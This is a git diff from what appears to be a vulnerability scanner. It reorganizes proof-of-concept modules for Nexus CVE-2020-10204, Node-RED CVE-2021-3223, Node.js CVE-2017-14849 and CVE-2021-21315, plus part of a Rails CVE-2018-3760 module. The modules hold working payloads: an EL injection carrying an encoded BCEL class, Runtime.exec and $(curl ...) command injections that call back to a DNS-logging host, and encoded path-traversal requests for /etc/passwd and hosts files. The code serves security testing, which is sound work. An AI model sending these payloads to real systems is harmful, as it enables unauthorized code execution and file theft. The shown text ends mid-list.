+                 https://github.com/aleenzz/CVE-2020-10199
+
+3.21.1及之前版本中, 存在一处任意EL表达式注入漏洞, CVE-2018-16621的绕过
+'''
+
+from lib.api.dns import dns
+from lib.tool.md5 import random_md5, random_int_1
+from lib.tool import head
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.random_str = random_md5(6)
+        RCEcommand = 'echo ' + self.random_str
+
+        random_num = random_int_1()
+        self.random_num_sum = str(random_num * random_num)
+
+        self.payloads = [
+            {
+                'path': 'service/extdirect',
+                'data': '''{"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"admin@example.org","status":"active","roles":["nxadmin$\\\\C{' '.getClass().forName('com.sun.org.apache.bcel.internal.util.ClassLoader').newInstance().loadClass('$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$eb$7f$UW$Z$7eN$b2$d9$99L$s$9bd6$9bd$A$xH$80M$80$5dJ$81$96$e5bC$K$e5$S$u$924$YR$ad$93eH$W6$3b$db$d9$d9$Q$d0j$d1Z$ea$adVQ$yj$d1R5$de5$a2$h$q$82h$V$b5$9f$fc$ea7$3f$f6$_$e0$83$3f$7f$8d$cf$99$dd$N$d9d$5b$fc$R$ce$ceyo$e7y$df$f3$3e$ef$cc$db$ef$de$bc$N$60$L$fe$a1$n$IGAVC$N$9cz$$$cfI$89$ab$m$a7$e2i$Nm$f04$e41$n$97$b3$w$s$a5$e4$9c$8a$f3$K$86U$7cR$c5$a74t$e0y$v$fd$b4$8a$cfhX$81$XT$5cP$f0Y$v$fa$9c$82$X5$7c$k$_$a9$b8$a8$e2e$F_P$f1E$V_R$f1e$F_Q$f1$8a$8a$afjx$V_$93$cb$d7$V$5cR$f0$N$N$df$c4e$Nk$f1$z$Nk$f0$9a$82$x$g$ba$e1$c8$cd$b7$e5$d3wT$7cW$fe$be$aea$r$ae$ca$e5$7b$K$be$af$e0$N$81$a07$e6$da$d6I$B$a3$ef$b45a$c5$d3Vf4$3e$e0$cbvP$bb3$95Iy$bb$Fj$a3$5d$83$C$81$5e$e7$a4$z$d0$d4$97$ca$d8G$f2$e3$p$b6$3b$60$8d$a4m$e9$ec$q$ad$f4$a0$e5$a6$e4$be$q$Mxc$a9$9c$40C$9f$3d$91J$c7$e5$c2$88$ea$ced$ba$U3$b4$df$f3$b2$bdN$sc$t$bd$94$93$RhY$A$a17m$e5r$b4o$Y$93Fc$W$ad$d2$95$m$9f$g9MGi$b2$7f$a1$89$e2$da$cf$e5$ed$9cG$f0cL$c2v$x$bd$fa$3d7$95$Z$95$40$5c$3b$97u29$C$N$9euS$9e4$8c$U$NSN$fc$u$ad$bc$e3$be$98$b6$b5$c9qV$u$3c$5c$zNM$969$86$Xh$8e$baN$d2$f6$b1$d7$8c0f$c7$7c$cc$3d$f9S$a7l$d7$3ey$cc$87$r$f5$b9$91y$fd$82$a0E$3b$ea$D$ac$94$84G$a4$f94$T$K$8d$z$wX$d0$f1k$m$a0$Xo$d1$bf$F$c21$X$c4t$edSi$da$c4$f7$a5$ec$b4$bc$d2$d0$C$d3$c3V$96$d8$x$F$y$fc$f9$f3$C$9a$t$_$d1wbM$8b$e7$e4$W$d5$60$fe$G4$3b$e3$b9$e7$fc$xcw$f8$9bA$x$9d$_$bb$b7Uv$c7$b9l$b9CZ$X_$f8$ce$ee$dd$M$d7$d8$efY$c93$c4$e2$9b$91U$K$ae$91$V$q$I$d9$40$S$u8$a8$e0M$bf$f5$af$94$fbX$ebw$f2n$92$t$ca$b8$f5$b2$d9b2$b6$8emx$b4$q$f0$5bP$t$7f$b7$ea$f8$B$7e$u$d0$bc$b8$e3u$fc$IS$3cL$c7$8f$f1$T$j$3f$c5$cf$E$3a$a5QL$g$c5$G$ee$X$aas$a0$a2h$3a$7e$8e_$I$d4y$c5$bc$ba$ff$l$9f$ce$bd$b2Nt$9a$90$a5$d2$f1K$fcJ$c7$af1$z$b0$ceqGc6y$92$cd$d9$b1$d3$b6$e7$9d$8b$e5lw$c2vc$95$8c$d1$f1$h$5c$e7$8d$8e$da$5e$F$F$9a$WUU$c7o$f1$bb$8at$8b7$a7$a0$a0c$G7X$3d$868V$e6M$bd$8cW$a2N$f3$e2$e6$q$Z$b6l$daB$d2$f9$ke$GI$97$e3$r$S$85$abp$88$W$f1$91T$s$3eb$e5$c6$d8$f7$h$93$K$7e$af$e3$sfu$fc$B$b7$d8$n$d59$c2N$$$x$Od$b2y$8f$Qlk$bc$a8c$H$e8$b8$8d$3f$ca$h$be$p$97$3f$95$c3$y$a1$92$8e$3fcZ$c7$5b$f8$8b$80$d0t$fcU$ee$ee$e2o$3a$fe$$$9bc$e5$7d$af$D$e9$b4$3dj$a5$7b$92$92$c1$7b$t$93v$b6H$b4$f0$7d$93$F$d2$f6$f7$60$Z$t$d9$92q$c0$aeN$e6$5d$97$dc$Y$u$N$dc$d6hW$b5$91$db$ccR$3e$c1$cb$b7X$85R$b4$8d$d1$a5$83$a7$eb$7d$u$de$98$b3$bdb$K$a9$e2$m$8e$9e$90$d3$bb$96$91$F$d6F$972$b8$ab$g$a9$95S$8e$7b$c4$g$a7$ff$9a$H$9c_$9e$d5$w$P$u$N$81p$b4$9a$81B$83b$c8$ca$e4$e7$87i$90$3d$e8O$b0H5$94$t$8a$8dv$d8$f6$c6$i$96$e5$f1$w$b0$86$97$9cZ$adP$c5$I$3c$af$e3$bdt$84$92$caL8g$Iu$7b$V$uU$a6$60$d5$g$$$e8$83c$f9$8c$97$92$a9$fb$5c$xo$o$Vu$u$89$e5$e8$b7$t$ed$a4$404Z$e5$9d$d3U$f5e$p$a7$c0$C$92$b0$3b$cb$a1$x$d9$p$b3$8eVU$c8$k$J$dfW$95$5eSR$aa$fas$ab$f82$b2$b2Y$3b$c3$falx$40S$yz$97$a9$9eS$k$mu$fe$ebv$d1$j$97$p$f0$b4$bad$da$c9$d9X$c5$ef$aa$m$bf$b7X19$b3$f9T$c3g$8es$ae$8fq$X$e7$af$e0o$5d$f7$M$c4$b4$af$de$ce5$e8$LU$q$b8$eaE$D$ec$c0N_$b6$ab$ec$i$e8$a4$dd2$c6$7es$W5C3$a8$bd$8e$c0$N$d4$j2$82$86R$80$da$b7$3eP$40$fd$fa$ee$C$b4$c3F$c3$N$e8G6$g$8d$94$t$Cf$40j$cc$c0$G$aa$ee$m$c4$bfD$9d$d1D$8bD$d0$M$g$cd$d2F1$V$df$a6$$$a1$9a$ea$edm$f5$b5$db$b4$88$W$a9$bf$s$b6$9ajD$db$9ch0$h$ee$8a$d5$a6b60FB7$f5$bb$a2$d9$d4$Lh$v$c00$c2$F$b4$5e$e1$d8$93$fbD$a3$d9hDjo$a1$ad$80vS$e7CG$Bf$od$86$a4$b2$c9l2$96$95$95$a1$b2$b2$d9$q$86$Wcy$80$8a$a1ZcE$bf$d46s$d7$c1$dd$H$b83$ef$60E$a2$85$be$P$z$f15LC$fa$7e$b0$ac0J$8a$3bX$99$I$Hoa$FC$ac$ea$l$K$Y$l$ea$l$aa3$5b$fa$T$ad7$b0$dal$z$a03$R$99$c5$9a$a1Y$ac$j2$p$F$ac$9bAt$G$5d$89$b6Yt$b3$b6$eb$T$ed$s$e3m$YJt$dcE$d8l7$Zs$a3$R$e3r$7cj$ee$j$b3$bd$80x$c24$c3$a6Y$c0$s$93$f9$3f$3c$85$ba$84$fe$a2$s$a6$de$7d$7b$K$81C$d3$bc$d8IqI$5c$c6fh$e2$aax$D$8f$m$e0_$f5U$ac$e3Z$cf$fehD$IM$fcxn$c6r$84$d99m$d4t$b0CL$f6$cdr$f4$e2$n$i$e4Go$3f5CX$8d$i$3a1$c9$af$e5$L$b4z$JQ$5cF$X$5e$c7z$5c$c7$G$be$93b$f8$t6$e1$k$k$W$3a6$8b$u$k$R$bb$b0E$3c$89$ad$e2$Zl$T6$k$TYl$X$_$60$87$b8$88$5d$e2$V$ec$W$97$d0Kt$3d$e25$ac$WW$b1$9f$I$f7$89k$3cQ$b6$e0$3bhg$ec$7b$d8$8d$P$T$e5u$fc$h$8f$a3$87ho$e2_$d8CY$TO$7b$8b$I$7b$88$fd$k$z$9f$c0$5e$b4$f0$e4$8b$d8G$99$c1$f3$cf$e0I$ecG$98$u$Gq$80Q$5b$89$a5$P$87$f8$3fBD$8f$e20$8e$a0$8d$b8bx$KG$d1$$$c6$99$d9G$Y$a5$83$f8t$i$e3$93$89$L$c2$60$f6$3d$dc$e7$c4$g$M$f0$a9$B$n$f1j$89Wm$e2e$3c$cd$e8$C$ab$c4$f38Nm$N$d6$89$b3$f8$u$f1$d5$o$$$iVm$905$ef$V$c38$81a$S$ea$a0$Y$c03$d4$G$d1$_$O$e1c$d4$w$f8$b8$8cD$cfb$b6$cf2$dbb$8e$cf2$c7OP7$8d$fa9$d8hP$60$v$YQ$c0o$80$93$feCh$feA$90$aes$fc$d7$f1$be6$be$b8$a8$99_m$7f$3d$a5$60T$c1$98$82$94$82$d3$c0$7f$b1$8c$9a9$Y$d0$l$U$Q$d8$a3$e0$cc$7f$m$e6$98$j$fc$5dZ$8e$9eq$7f$aed$fe$H$c3$e0$Q$5e$fb$N$A$A').newInstance()}"]}],"type":"rpc","tid":11}''',
+                'headers': {'404': RCEcommand}
+            },
+            {
+                'path': 'service/extdirect',
+                'data': '''{"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"admin@example.org","status":"active","roles":["nxadmin$\\\\C{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('curl DNSDOMAIN')}"]}],"type":"rpc","tid":11}''',
+                'headers': {}
+            },
+            {
+                'path': 'service/extdirect',
+                'data': '''{"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"admin@example.org","status":"active","roles":["nxadmin$\\\\C{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('ping -c 4 DNSDOMAIN')}"]}],"type":"rpc","tid":11}''',
+                'headers': {}
+            },
+            {
+                'path': 'service/extdirect',
+                'data': '''{"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"admin@example.org","status":"active","roles":["nxadmin$\\\\C{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('ping DNSDOMAIN')}"]}],"type":"rpc","tid":11}''',
+                'headers': {}
+            },
+            {
+                'path': 'service/extdirect',
+                'data': '''{"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"admin@example.org","status":"active","roles":["nxadmin$\\\\B{NUM*NUM}"]}],"type":"rpc","tid":11}'''.replace('NUM', str(random_num)),
+                'headers': {}
+            }
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        sessid = '405b1f856a5cad633f19caf344586cce'
+
+        vul_info = {
+            'app_name': 'Nexus',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2020-10204',
+        }
+
+        base_headers = {
+            'Content-Type': 'application/json',
+            'X-Requested-With': 'XMLHttpRequest',
+            'Referer': client.protocol_domain,
+            'Origin': client.protocol_domain,
+        }
+
+        for payload in self.payloads:
+            md = random_md5()                                       # * 随机md5值, 8位
+            dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
+
+            path = payload['path']
+            data = payload['data'].replace('DNSDOMAIN', dns_domain)
+            headers = payload['headers']
+
+            merge_headers = head.merge(base_headers, headers)
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                headers=merge_headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if ((check.check_res(res.text, self.random_str))     # * 可以运行命令, 有回显
+                or (dns.result(md, sessid))                 # * 可以运行命令, 无回显
+                or (self.random_num_sum in res.text)             # * 可以执行EL表达式
+            ):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
+
+
+def cve_2020_10204_scan(self, clients):
+    '''  '''
diff --git a/payloads/Nexus/tool_get_yumid.py b/payloads/Nexus/tool_get_yumid.py
index 348156f..9045463 100644
--- a/payloads/Nexus/tool_get_yumid.py
+++ b/payloads/Nexus/tool_get_yumid.py
@@ -12,7 +12,7 @@
     {'path': 'capabilities/'},
 ]
 
-def get_yumID(self, client, vul_info):
+def get_yumID(client, vul_info):
     ''' 获取Nexus Yum: Configuration的id '''
     headers = {
         'Content-Type': 'application/json',
diff --git a/payloads/NodeRED/cve_2021_3223.py b/payloads/NodeRED/cve_2021_3223.py
deleted file mode 100644
index fd0c137..0000000
--- a/payloads/NodeRED/cve_2021_3223.py
+++ /dev/null
@@ -1,51 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool import check
-
-cve_2021_3223_payloads = [
-    {'path': 'ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'},
-    {'path': 'ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%2fWindows%2fSystem32%2fdrivers%2fetc%2fhosts'},
-    {'path': 'ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts'},
-    {'path': 'ui_base/js/..%2f..%2f..%2f..%2fsettings.js'},
-    {'path': 'js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'},
-    {'path': 'js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%2fWindows%2fSystem32%2fdrivers%2fetc%2fhosts'},
-    {'path': 'js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts'},
-    {'path': 'js/..%2f..%2f..%2f..%2fsettings.js'},
-]
-
-def cve_2021_3223_scan(clients):
-    ''' Node-RED由于未对url中传输的路径进行严格过滤, 导致攻击者可构造特殊路径进行任意文件读取
-            Node-Red-Dashboard version < 2.26.2
-            (Node-Red插件Node-Red-Dashboard, 如果未安装此插件, 或插件版本高于2.26.2, 则不受影响)
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'Node-RED',
-        'vul_type': 'File-Read',
-        'vul_id': 'CVE-2021-3223',
-    }
-
-    for payload in cve_2021_3223_payloads:
-        path = payload['path']
-
-        res = client.request(
-            'get',
-            path,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (check.check_res_fileread(res.text)
-            or ('To password protect the Node-RED editor and admin API' in res.text)
-        ):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/NodeRED/main.py b/payloads/NodeRED/main.py
deleted file mode 100644
index 6b33d85..0000000
--- a/payloads/NodeRED/main.py
+++ /dev/null
@@ -1,31 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-Node-RED是一种编程工具, 事件驱动应用程序的低代码编程, 用于以新颖有趣的方式将硬件设备、API和在线服务连接在一起: https://nodered.org/
-    Node-RED扫描类: 
-        1. Node-RED 任意文件读取
-            CVE-2021-3223
-                Payload: https://blog.csdn.net/weixin_51387754/article/details/121532015
-
-file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.NodeRED.cve_2021_3223 import cve_2021_3223_scan
-
-class NodeRED():
-    def __init__(self):
-        self.app_name = 'Node-RED'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2021_3223_scan, clients=clients)
-        ]
-
-nodered = NodeRED()
diff --git a/payloads/NodeRED/nodered-cve-2021-3223-fileread.py b/payloads/NodeRED/nodered-cve-2021-3223-fileread.py
new file mode 100644
index 0000000..8f9274f
--- /dev/null
+++ b/payloads/NodeRED/nodered-cve-2021-3223-fileread.py
@@ -0,0 +1,66 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Node-RED 任意文件读取
+    CVE-2021-3223
+        Payload: https://blog.csdn.net/weixin_51387754/article/details/121532015
+
+Node-RED由于未对url中传输的路径进行严格过滤, 导致攻击者可构造特殊路径进行任意文件读取
+    Node-Red-Dashboard version < 2.26.2
+    (Node-Red插件Node-Red-Dashboard, 如果未安装此插件, 或插件版本高于2.26.2, 则不受影响)
+'''
+
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'},
+            {'path': 'ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%2fWindows%2fSystem32%2fdrivers%2fetc%2fhosts'},
+            {'path': 'ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts'},
+            {'path': 'ui_base/js/..%2f..%2f..%2f..%2fsettings.js'},
+            {'path': 'js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'},
+            {'path': 'js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%2fWindows%2fSystem32%2fdrivers%2fetc%2fhosts'},
+            {'path': 'js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fC:%5cWindows%5cSystem32%5cdrivers%5cetc%5chosts'},
+            {'path': 'js/..%2f..%2f..%2f..%2fsettings.js'},
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Node-RED',
+            'vul_type': 'File-Read',
+            'vul_id': 'CVE-2021-3223',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+
+            res = client.request(
+                'get',
+                path,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (check.check_res_fileread(res.text)
+                or ('To password protect the Node-RED editor and admin API' in res.text)
+            ):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Nodejs/cve_2017_14849.py b/payloads/Nodejs/cve_2017_14849.py
deleted file mode 100644
index c17302e..0000000
--- a/payloads/Nodejs/cve_2017_14849.py
+++ /dev/null
@@ -1,46 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool import check
-
-cve_2017_14849_payloads = [
-    {'path': 'static/%2e%2e/%2e%2e/%2e%2e/a/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'},
-    {'path': '%2e%2e/%2e%2e/%2e%2e/a/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'},
-    {'path': 'static/%2e%2e/%2e%2e/%2e%2e/a/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:/Windows/System32/drivers/etc/hosts'},
-    {'path': '%2e%2e/%2e%2e/%2e%2e/a/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:/Windows/System32/drivers/etc/hosts'},
-    { 'path': 'static/%2e%2e/%2e%2e/%2e%2e/a/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:\\Windows\\System32\\drivers\\etc\\hosts'},
-    { 'path': '%2e%2e/%2e%2e/%2e%2e/a/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:\\Windows\\System32\\drivers\\etc\\hosts'}
-]
-
-def cve_2017_14849_scan(clients):
-    ''' Joyent Node.js 8.6.0之前的8.5.0版本中存在安全漏洞
-        远程攻击者可利用该漏洞访问敏感文件
-    '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'Node.js',
-        'vul_type': 'File-Read',
-        'vul_id': 'CVE-2017-14849',
-    }
-
-    for payload in cve_2017_14849_payloads:
-        path = payload['path']
-
-        res = client.request(
-            'get',
-            path,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (check.check_res_fileread(res.text)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Nodejs/cve_2021_21315.py b/payloads/Nodejs/cve_2021_21315.py
deleted file mode 100644
index a419201..0000000
--- a/payloads/Nodejs/cve_2021_21315.py
+++ /dev/null
@@ -1,53 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import random_md5
-from time import sleep
-
-cve_2021_21315_payloads = [
-    {'path': 'api/getServices?name[]=$(curl DNSDOMAIN)'},
-    {'path': 'api/getServices?name[]=$(ping -c 4 DNSDOMAIN)'},
-    {'path': 'api/getServices?name[]=$(ping DNSDOMAIN)'},
-    {'path': 'getServices?name[]=$(curl DNSDOMAIN)'},
-    {'path': 'getServices?name[]=$(ping -c 4 DNSDOMAIN)'},
-    {'path': 'getServices?name[]=$(ping DNSDOMAIN)'}
-]
-
-def cve_2021_21315_scan(clients):
-    ''' Node.js库中的systeminformation软件包中存在一个命令注入漏洞, 
-        攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令
-    '''
-    client = clients.get('reqClient')
-    sessid = 'ea16de03573ce0c2f731fa40de93ecd7'
-
-    vul_info = {
-        'app_name': 'Node.js',
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2021-21315',
-    }
-
-    for payload in cve_2021_21315_payloads:
-        md = random_md5()                                       # * 随机md5值, 8位
-        dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
-
-        path = payload['path'].replace('DNSDOMAIN', dns_domain)
-
-        res = client.request(
-            'get',
-            path,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        sleep(3)
-        if (dns.result(md, sessid)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/Nodejs/main.py b/payloads/Nodejs/main.py
deleted file mode 100644
index 67e0307..0000000
--- a/payloads/Nodejs/main.py
+++ /dev/null
@@ -1,37 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-Joyent Node.js是美国Joyent公司的一套建立在Google V8 JavaScript引擎之上的网络应用平台
-    Nodejs扫描类: 
-        1. Node.js 目录穿越
-            CVE-2017-14849
-                Payload: https://vulhub.org/#/environments/node/CVE-2017-14849/
-
-        2. Node.js 命令执行
-            CVE-2021-21315
-                Payload: https://blog.csdn.net/weixin_47179815/article/details/125799014
-
-file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.Nodejs.cve_2017_14849 import cve_2017_14849_scan
-from payloads.Nodejs.cve_2021_21315 import cve_2021_21315_scan
-
-class Nodejs():
-    def __init__(self):
-        self.app_name = 'Node.js'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2017_14849_scan, clients=clients),
-            thread(target=cve_2021_21315_scan, clients=clients)
-        ]
-
-nodejs = Nodejs()
diff --git a/payloads/Nodejs/nodejs-cve-2017-14849-fileread.py b/payloads/Nodejs/nodejs-cve-2017-14849-fileread.py
new file mode 100644
index 0000000..10409cc
--- /dev/null
+++ b/payloads/Nodejs/nodejs-cve-2017-14849-fileread.py
@@ -0,0 +1,61 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Node.js 目录穿越
+    CVE-2017-14849
+        Payload: https://vulhub.org/#/environments/node/CVE-2017-14849/
+
+Joyent Node.js 8.6.0之前的8.5.0版本中存在安全漏洞
+    远程攻击者可利用该漏洞访问敏感文件
+'''
+
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'static/%2e%2e/%2e%2e/%2e%2e/a/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'},
+            {'path': '%2e%2e/%2e%2e/%2e%2e/a/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'},
+            {'path': 'static/%2e%2e/%2e%2e/%2e%2e/a/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:/Windows/System32/drivers/etc/hosts'},
+            {'path': '%2e%2e/%2e%2e/%2e%2e/a/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:/Windows/System32/drivers/etc/hosts'},
+            { 'path': 'static/%2e%2e/%2e%2e/%2e%2e/a/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:\\Windows\\System32\\drivers\\etc\\hosts'},
+            { 'path': '%2e%2e/%2e%2e/%2e%2e/a/%2e%2e/%2e%2e/%2e%2e/%2e%2e/C:\\Windows\\System32\\drivers\\etc\\hosts'}
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Node.js',
+            'vul_type': 'FileRead',
+            'vul_id': 'CVE-2017-14849',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+
+            res = client.request(
+                'get',
+                path,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (check.check_res_fileread(res.text)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Nodejs/nodejs-cve-2021-21315-rce.py b/payloads/Nodejs/nodejs-cve-2021-21315-rce.py
new file mode 100644
index 0000000..d8b447c
--- /dev/null
+++ b/payloads/Nodejs/nodejs-cve-2021-21315-rce.py
@@ -0,0 +1,66 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Node.js 命令执行
+    CVE-2021-21315
+        Payload: https://blog.csdn.net/weixin_47179815/article/details/125799014
+
+Node.js库中的systeminformation软件包中存在一个命令注入漏洞, 
+    攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令
+'''
+
+from lib.api.dns import dns
+from lib.tool.md5 import random_md5
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'api/getServices?name[]=$(curl DNSDOMAIN)'},
+            {'path': 'api/getServices?name[]=$(ping -c 4 DNSDOMAIN)'},
+            {'path': 'api/getServices?name[]=$(ping DNSDOMAIN)'},
+            {'path': 'getServices?name[]=$(curl DNSDOMAIN)'},
+            {'path': 'getServices?name[]=$(ping -c 4 DNSDOMAIN)'},
+            {'path': 'getServices?name[]=$(ping DNSDOMAIN)'}
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        sessid = 'ea16de03573ce0c2f731fa40de93ecd7'
+
+        vul_info = {
+            'app_name': 'Node.js',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2021-21315',
+        }
+
+        for payload in self.payloads:
+            md = random_md5()                                       # * 随机md5值, 8位
+            dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
+
+            path = payload['path'].replace('DNSDOMAIN', dns_domain)
+
+            res = client.request(
+                'get',
+                path,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (dns.result(md, sessid)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/RubyOnRails/cve_2018_3760.py b/payloads/RubyOnRails/cve_2018_3760.py
deleted file mode 100644
index 72683a2..0000000
--- a/payloads/RubyOnRails/cve_2018_3760.py
+++ /dev/null
@@ -1,79 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool import check
-import re
-
-cve_2018_3760_payloads = [
-    {
-        'path-1': 'assets/file:%2f%2f/etc/passwd',
-        'path-2': 'assets/file:%2f%2f{}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd',
-    },
-    {
-        'path-1': 'assets/file:%2f%2f/C:/Windows/System32/drivers/etc/hosts',
-        'path-2': 'assets/file:%2f%2f{}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/C:/Windows/System32/drivers/etc/hosts',
-    },
-    {
-        'path-1': 'file:%2f%2f/etc/passwd',
-        'path-2': 'file:%2f%2f{}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd',
-    },
-    {
-        'path-1': 'file:%2f%2f/C:/Windows/System32/drivers/etc/hosts',
